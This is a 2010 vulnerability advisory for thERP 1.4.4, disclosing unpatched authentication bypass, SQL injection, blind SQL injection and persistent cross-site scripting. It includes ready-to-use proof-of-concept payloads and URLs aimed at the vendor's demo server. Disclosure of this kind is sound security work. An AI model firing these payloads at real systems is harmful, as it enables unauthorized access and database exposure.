thERP multiple security vulnerabilities

thERP 1.4.4 multiple security vulnerabilities

There are multiple security vulnerabilities in thERP <= 1.4.4 which allow an unauthorized user to take control of the software.

Software

Software Link: thERP

Vulnerable Version: <= 1.4.4

Vendor Notification: service@softexconsulting.com [ 2010-11-16 10:30 PM ]

# No reply from vendor by 2010-11-23 # Advisory released.

Vulnerabilities

# Authentication Bypass # Unpatched

Username: admin Password: 'or'1'='1

The following proof of concept is available :

data:text/html;charset=utf-8,<form name=postform method="POST" action="http://demos1.softexconsulting.com/demos/therp/common/security.php"><input type=text name=username value="admin"><input type=hidden name=pwd value="'or'1'='1"><input type=hidden name=login value='Login'></form><script>document.forms[0].submit()</script>

# SQL Injection # Unpatched

The following proof of concept is available :

http://demos1.softexconsulting.com/demos/therp/erp/product.php?productid=-1 union select 1,2,concat(user(),"/",current_user(),"+at+",@@datadir,"+v",@@version)--

http://demos1.softexconsulting.com/demos/therp/erp/product_prices.php?productid=-1%20union%20select%20concat%28user%28%29,%22/%22,current_user%28%29,%22%20at%20%22,@@datadir,%22%20v%22,@@version%29--

http://demos1.softexconsulting.com/demos/therp/erp/product_attributes.php?productid=-1%20union%20select%20concat%28user%28%29,%22/%22,current_user%28%29,%22%20at%20%22,@@datadir,%22%20v%22,@@version%29--

http://demos1.softexconsulting.com/demos/therp/sales/salesorder.php?customerid=-1 union select @@version--

http://demos1.softexconsulting.com/demos/therp/sales/receipt.php?customerid=-1 union select @@version--

http://demos1.softexconsulting.com/demos/therp/project/projects.php?description=-1' union select @@version,2 as '

http://demos1.softexconsulting.com/demos/therp/common/usergroup.php?groupid=-1%27%20union%20select%20@@version,2%20as%20%27a

http://demos1.softexconsulting.com/demos/therp/common/users.php?full_name=-1' union select @@version,2,3,4 as 'a

# Blind SQL Injection # Unpatched

The following proof of concept is available :

http://demos1.softexconsulting.com/demos/therp/sales/customer.php?customerid=-1 union select sleep(10),2,3,4,5,6,7,8,9,0--

http://demos1.softexconsulting.com/demos/therp/manufacturing/productionorder.php?orderid=-1 union select sleep(10),2,3,4,5--

# Persistent Cross Site Scripting # Unpatched

Cross-Site Scripting payloads can be injected in to the logs by mangling an SQL query and appending the XSS payload. The SQL error will be saved to the log along with the XSS payload. The paylod will be executed whenever an authorized user browses "/common/logger.php"

View XSS:
	
http://demos1.softexconsulting.com/demos/therp/common/logger.php

Reference

# OWASP: SQL Injection

# OWASP: Cross-Site Scripting

# OWASP: Authentication Bypass

Appendix

[TXT] thERP multiple security vulnerabilities